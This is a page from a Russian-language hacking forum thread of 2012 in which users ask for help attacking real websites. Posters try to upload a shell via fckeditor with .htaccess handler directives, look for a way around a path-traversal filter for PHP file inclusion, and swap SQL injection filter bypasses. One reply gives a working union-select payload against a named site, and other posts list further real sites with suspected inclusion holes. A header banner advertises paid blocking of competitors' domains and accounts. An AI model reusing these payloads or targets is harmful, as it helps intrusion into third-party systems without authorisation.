УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2184 из 2438

2184

Опции темы

Поиск в этой теме

Опции просмотра

#21831

17.12.2012, 01:58

shramoff

Guest

Сообщений: n/a

Провел на форуме:
399

Репутация: 0

Нужна Ваша помощь.

Нашел уязвимость на неком сайте в fckeditor. Можно заливать файлы все кроме php. Примечательно, что можно залить файл .htaccess даже. Я пробовал залить шелл с произвольным расширением в связке к примеру :

Код:

Code:
 ForceType application/x-httpd-php SetHandler application/x-httpd-php

Но, вот какая незадача, он вместо запуска скачивается.

Прошу Вашей помощи.

Ccылка на уязвимость

Ссылка на файлы загруженные через едитор

Вобщем думаю знатокам будет интересно. Жду Ваших советов

#21832

17.12.2012, 18:01

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

вопрос по htaccess

могу ли я выставлять права в фаиле htaccess

лежащем в деректории /var/html/www/1234

на директорию /var/html/www/12345

и как если да?

#21833

17.12.2012, 18:43

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от ReVOLVeR

ReVOLVeR said:
вопрос по htaccess
могу ли я выставлять права в фаиле htaccess
лежащем в деректории /var/html/www/1234
на директорию /var/html/www/12345
и как если да?

нет. Не можешь. Только на дочерние.

#21834

17.12.2012, 19:14

Qwert321

Новичок

Регистрация: 25.01.2009

Сообщений: 1

Провел на форуме:
4954

Репутация: 0

Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:

http://site/vulnerable.php?file=inj.php

а надо

http://site/vulnerable.php?file=../../inj.php

+ фильтрация такова:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]))[/COLOR][/COLOR]

#21835

17.12.2012, 21:24

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от Qwert321

Qwert321 said:
Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:
http://site/vulnerable.php?file=inj.php
а надо
http://site/vulnerable.php?file=../../inj.php
+ фильтрация такова:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]))[/COLOR][/COLOR]

Если сервер на Windows то может помочь обратный слэш\

#21836

17.12.2012, 21:38

FunOfGun

Guest

Сообщений: n/a

Провел на форуме:
109228

Репутация: 124

Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?

Не хочу быть навязчивым, но сейчас результат моего скрипта ~20 предполагаемых скулей(15 из них подтверждаются, но "наличие" скулей в youtube и hpc напрягает ) из 230 линков. Это нормальный показатель?

Заранее благодарен.

#21837

17.12.2012, 21:47

WendM

Guest

Сообщений: n/a

Провел на форуме:
11466

Репутация: 3

Цитата:

Сообщение от FunOfGun

FunOfGun said:
Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?

Может линк покажите?

#21838

17.12.2012, 21:51

FunOfGun

Guest

Сообщений: n/a

Провел на форуме:
109228

Репутация: 124

Цитата:

Сообщение от WendM

WendM said:
Может линк покажите?

http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--

#21839

17.12.2012, 22:00

WendM

Guest

Сообщений: n/a

Провел на форуме:
11466

Репутация: 3

Цитата:

Сообщение от FunOfGun

FunOfGun said:
http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--

Собственно все просто, просто побольше читать...

Код:

Code:
http://www.currentsolutions.com/articles.php?id=99999.9+/*!union*/(select+1,2,3,4)+--+

#21840

18.12.2012, 14:34

0xd098d0b3d0

Guest

Сообщений: n/a

Провел на форуме:
21406

Репутация: 0

http://flowap.ru/download/index.php?...ile=config.php

Я так понимаю это php инж. Но файл кфг пустой, что дальше делать??

http://io.nios.ru/index.php?showpage&page=config.php

И вот тут подскажите что делать дальше

Страница 2184 из 2438

2184

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход